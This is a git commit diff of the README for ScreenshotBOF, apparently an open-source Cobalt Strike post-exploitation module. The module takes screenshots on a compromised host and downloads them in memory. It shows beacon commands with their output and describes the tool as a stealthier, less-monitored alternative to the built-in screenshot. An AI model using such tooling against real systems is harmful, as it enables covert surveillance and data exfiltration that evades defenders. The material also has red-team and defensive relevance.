readme
This commit is contained in:
parent
1383db6e7e
commit
7e0ee92cc4
22
README.md
22
README.md
|
@ -1,6 +1,6 @@
|
||||||
# ScreenshotBOF
|
# ScreenshotBOF
|
||||||
|
|
||||||
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.
|
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.
|
||||||
|
|
||||||
## Self Compilation
|
## Self Compilation
|
||||||
1. git clone the repo
|
1. git clone the repo
|
||||||
|
@ -9,29 +9,20 @@ An alternative screenshot capability for Cobalt Strike that uses WinAPI and does
|
||||||
|
|
||||||
## Usage
|
## Usage
|
||||||
1. import the screenshotBOF.cna script into Cobalt Strike
|
1. import the screenshotBOF.cna script into Cobalt Strike
|
||||||
2. use the command screenshot_bof
|
2. use the command screenshot_bof {local filename}
|
||||||
3. Download the screenshot from the target
|
|
||||||
```
|
```
|
||||||
beacon> screenshot_bof
|
beacon> screenshot_bof sad.bmp
|
||||||
[*] Running screenshot BOF by (@codex_tf2)
|
[*] Running screenshot BOF by (@codex_tf2)
|
||||||
[+] host called home, sent: 3411 bytes
|
[+] host called home, sent: 4860 bytes
|
||||||
[+] received output:
|
[+] received output:
|
||||||
[*] Tasked beacon to printscreen and save to disk
|
[*] Tasked beacon to printscreen and save to sad.bmp
|
||||||
[+] received output:
|
[+] received output:
|
||||||
[+] PrintScreen saved to bitmap...
|
[+] PrintScreen saved to bitmap...
|
||||||
[+] received output:
|
[*] started download of sad.bmp
|
||||||
[+] Printscreen bitmap saved to screenshot.bmp
|
|
||||||
beacon> download screenshot.bmp
|
|
||||||
[*] Tasked beacon to download screenshot.bmp
|
|
||||||
[+] host called home, sent: 22 bytes
|
|
||||||
[*] started download of C:\screenshot.bmp (12441668 bytes)
|
|
||||||
[*] download of screenshot.bmp is complete
|
|
||||||
```
|
```
|
||||||
|
|
||||||
## Notes
|
## Notes
|
||||||
- no evasion is performed, which should be fine since the WinAPIs used are not malicious
|
- no evasion is performed, which should be fine since the WinAPIs used are not malicious
|
||||||
- in memory downloading of screenshots is planned to be added
|
|
||||||
- the filename can be changed in the source code.
|
|
||||||
|
|
||||||
## Why did I make this?
|
## Why did I make this?
|
||||||
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
|
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
|
||||||
|
@ -39,3 +30,4 @@ Cobalt Strike uses a technique known as fork & run for many of its post-ex capab
|
||||||
## Credits
|
## Credits
|
||||||
- Made using https://github.com/securifybv/Visual-Studio-BOF-template
|
- Made using https://github.com/securifybv/Visual-Studio-BOF-template
|
||||||
- Save BMP to file from https://stackoverflow.com/a/60667564
|
- Save BMP to file from https://stackoverflow.com/a/60667564
|
||||||
|
- in memory download from https://github.com/anthemtotheego/CredBandit
|
Loading…
Reference in New Issue